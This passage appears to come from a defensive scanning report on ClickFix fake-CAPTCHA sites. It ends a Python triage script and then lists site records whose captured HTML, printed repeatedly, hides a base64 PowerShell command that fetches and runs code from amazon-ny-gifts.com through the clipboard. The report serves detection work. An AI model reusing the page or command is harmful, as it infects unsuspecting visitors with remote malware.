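# Constructed sample: the relevant fragments of the captured fake-CAPTCHA page (script abridged).
CLICKFIX_SAMPLE = r'''<title>Verify You Are Human</title>
<p class="im-not-a-robot">I'm not a robot</p>
<li>Press & hold the Windows Key <i class="fab fa-windows"></i> + <b>R</b>.</li>
<code>"I am not a robot - reCAPTCHA Verification ID: <span id="verification-id">146820</span>"</code>
<script>
function setClipboardCopyData(textToCopy){
  const tempTextArea = document.createElement("textarea");
  tempTextArea.value = textToCopy;
  document.body.append(tempTextArea);
  tempTextArea.select();
  document.execCommand("copy");
  document.body.removeChild(tempTextArea);
}
const commandToRun = `POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
setClipboardCopyData(commandToRun);
</script>'''

# Constructed sample: the meta-refresh page recorded for bmdcompany.com / zamilgroups.com.
REDIRECT_SAMPLE = '''<html><head>
<meta http-equiv="refresh" content="7; url='https://t.me/LearnUSDT_bot?start=540835569'" />
</head><body></body></html>'''

if __name__ == "__main__":
    for sample, site in ((CLICKFIX_SAMPLE, "https://lucprofessional.grupomoltz.com.br/"),
                         (REDIRECT_SAMPLE, "https://bmdcompany.com/")):
        print(json.dumps(triage(sample, site), indent=1))
```

The decoder tries UTF-8 before UTF-16LE so that `-EncodedCommand` style payloads are also covered; the keyword and regex lists are deliberately the ones visible in the records above and should be widened against your own captures.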
https://laborpartyjo.com/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
JSON Technical Data
{ "URL": "https://laborpartyjo.com/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
https://www.thesignaturemag.salviatech.com/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
JSON Technical Data
{ "URL": "https://www.thesignaturemag.salviatech.com/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
